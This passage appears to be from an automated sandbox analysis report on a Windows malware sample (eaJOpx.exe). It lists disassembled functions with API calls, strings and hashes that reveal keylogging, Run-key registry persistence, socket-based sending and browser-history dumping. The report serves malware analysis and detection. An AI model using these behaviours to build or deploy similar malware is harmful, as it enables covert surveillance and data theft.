                                                    • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                    • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                    • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                    • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                    Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 0044F7C5
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 0044F7D7
                                                    • _free.LIBCMT ref: 0044F7E9
                                                    • _free.LIBCMT ref: 0044F7FB
                                                    • _free.LIBCMT ref: 0044F80D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                    • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                    • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                    • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                    Function 004432F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00443315
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 00443327
                                                    • _free.LIBCMT ref: 0044333A
                                                    • _free.LIBCMT ref: 0044334B
                                                    • _free.LIBCMT ref: 0044335C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                    • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                    • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                    • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                    Function 0044A74E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Zb1Y/
                                                    • API String ID: 0-3232713500
                                                    • Opcode ID: 9e83a2b49866c0a0954c16d09c1b4fdebb0170e65fb9d01d1df359b3d0c5ec62
                                                    • Instruction ID: 5d70a4bd2d1c51a970c61982e54133d3cdb531d847138a58e970e882949b52fd
                                                    • Opcode Fuzzy Hash: 9e83a2b49866c0a0954c16d09c1b4fdebb0170e65fb9d01d1df359b3d0c5ec62
                                                    • Instruction Fuzzy Hash: 2D51E471D442099BEF21EFA5C845BAF7BB8EF05314F15041BE804A7292D7789912C76B
                                                    Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                    • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                    • IsWindowVisible.USER32(?), ref: 004167A1
                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                      • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProcessWindow$Open$TextThreadVisible
                                                    • String ID: (FG
                                                    • API String ID: 3142014140-2273637114
                                                    • Opcode ID: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                    • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                    • Opcode Fuzzy Hash: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                    • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                    Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                      • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                      • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                      • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                    • String ID: XCG$`AG$>G
                                                    • API String ID: 2334542088-2372832151
                                                    • Opcode ID: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                    • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                    • Opcode Fuzzy Hash: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                    • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                    Function 00451C2B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00451D40
                                                      • Part of subcall function 00451B30: __alloca_probe_16.LIBCMT ref: 00451B99
                                                      • Part of subcall function 00451B30: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00451BF6
                                                      • Part of subcall function 00451B30: __freea.LIBCMT ref: 00451BFF
                                                    • _free.LIBCMT ref: 00451C96
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00451CD1
                                                      • Part of subcall function 00448716: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448757
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorHeapLast_free$AllocateByteCharFreeMultiWide__alloca_probe_16__freea
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2017883074-3232713500
                                                    • Opcode ID: fa74662142cd5858ff4d6864a187426225f9c372d33f4ac9e114e584781b7c87
                                                    • Instruction ID: 37ba5a20be2cd8d2b4f9ef08766fb7ac36f70a10c850ae4c02dc24b9b3ca764f
                                                    • Opcode Fuzzy Hash: fa74662142cd5858ff4d6864a187426225f9c372d33f4ac9e114e584781b7c87
                                                    • Instruction Fuzzy Hash: 0041D231900129AADF219F268C41F9B7BB9EF45311F10449BFC08E7252EA39DD588F69
                                                    Function 0044DB44 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID: $Zb1Y/$vD
                                                    • API String ID: 1807457897-679683684
                                                    • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                    • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                    • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                    • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                    Function 004426E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\eaJOpx.exe,00000104), ref: 00442724
                                                    • _free.LIBCMT ref: 004427EF
                                                    • _free.LIBCMT ref: 004427F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                    • API String ID: 2506810119-3086101319
                                                    • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                    • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                    • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                    • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                    Function 0044A536 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,0044A895,?,00000000,00000000), ref: 0044A5E9
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0044A895,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9D4,?), ref: 0044A617
                                                    • GetLastError.KERNEL32(?,0044A895,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9D4,?,00475B90,?,?,00000000,?), ref: 0044A648
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2456169464-3232713500
                                                    • Opcode ID: 17e9bdea2327856549b2d729a69f54a5a03eaa222f3bcd74165b36d2deefc3ff
                                                    • Instruction ID: d61c62bb4eb343eb36fdac958b1af53ef8a98a660c93d19da5ef6d7f77850f1b
                                                    • Opcode Fuzzy Hash: 17e9bdea2327856549b2d729a69f54a5a03eaa222f3bcd74165b36d2deefc3ff
                                                    • Instruction Fuzzy Hash: 85319071A00219AFDB24CF59DD819EAB7B8EF08315F0544BEE90AD7250D630EE90CF69
                                                    Function 00451B30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __alloca_probe_16.LIBCMT ref: 00451B99
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00451BF6
                                                    • __freea.LIBCMT ref: 00451BFF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                                    • String ID: Zb1Y/
                                                    • API String ID: 3062693170-3232713500
                                                    • Opcode ID: 613b976a2355cf4f4ba5ba8ffc7bdff0db3c2b567fd9e0d752e7206116cd8565
                                                    • Instruction ID: 52486ba57724fbc470e22a27d2e0df35c3603d2851d13dbef110add20b363999
                                                    • Opcode Fuzzy Hash: 613b976a2355cf4f4ba5ba8ffc7bdff0db3c2b567fd9e0d752e7206116cd8565
                                                    • Instruction Fuzzy Hash: 97314832A00156ABDB208F65CC45EAFBBA5DF40325F14466AFC14CB291EB38DC84C798
                                                    Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                      • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                    • String ID: /sort "Visit Time" /stext "$8>G
                                                    • API String ID: 368326130-2663660666
                                                    • Opcode ID: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                    • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                    • Opcode Fuzzy Hash: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                    • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                    Function 0044817A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 004481ED
                                                    • _free.LIBCMT ref: 00448243
                                                      • Part of subcall function 0044801F: _free.LIBCMT ref: 00448077
                                                      • Part of subcall function 0044801F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                      • Part of subcall function 0044801F: WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                      • Part of subcall function 0044801F: WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                    • String ID: Zb1Y/
                                                    • API String ID: 314583886-3232713500
                                                    • Opcode ID: a321ea17a487838045db2ce858005c675a897f4104d35ab4fa77d22e9e1a69bf
                                                    • Instruction ID: 0387677de0d9422e32f730e2557b1f6991b12741dc4ef5b7eb5f60d3584a26b6
                                                    • Opcode Fuzzy Hash: a321ea17a487838045db2ce858005c675a897f4104d35ab4fa77d22e9e1a69bf
                                                    • Instruction Fuzzy Hash: 37213E3180012897E73197658C41DEF777CDB42374F2102DFE899A3181DF785D82859D
                                                    Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                    • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                    • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread$LocalTimewsprintf
                                                    • String ID: Offline Keylogger Started
                                                    • API String ID: 465354869-4114347211
                                                    • Opcode ID: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
                                                    • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                    • Opcode Fuzzy Hash: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
                                                    • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                    Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                    • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                    • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                    • String ID: Online Keylogger Started
                                                    • API String ID: 112202259-1258561607
                                                    • Opcode ID: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
                                                    • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                    • Opcode Fuzzy Hash: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
                                                    • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                    Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                    • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                    • __dosmaperr.LIBCMT ref: 0044AB0E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                    • String ID: `@
                                                    • API String ID: 2583163307-951712118
                                                    • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                    • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                    • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                    • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                    Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00404946
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                    • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                    Strings
                                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$EventLocalThreadTime
                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                    • API String ID: 2532271599-1507639952
                                                    • Opcode ID: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
                                                    • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                    • Opcode Fuzzy Hash: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
                                                    • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                    Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                    • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                    • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEventHandleObjectSingleWait
                                                    • String ID: Connection Timeout
                                                    • API String ID: 2055531096-499159329
                                                    • Opcode ID: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
                                                    • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                    • Opcode Fuzzy Hash: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
                                                    • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                    Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,759237E0,?), ref: 004127AD
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,759237E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateValue
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                    • API String ID: 1818849710-1051519024
                                                    • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                    • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                    • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                    • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                    Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                      • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                      • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                    • String ID: bad locale name
                                                    • API String ID: 3628047217-1405518554
                                                    • Opcode ID: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
                                                    • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                    • Opcode Fuzzy Hash: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
                                                    • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                    Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
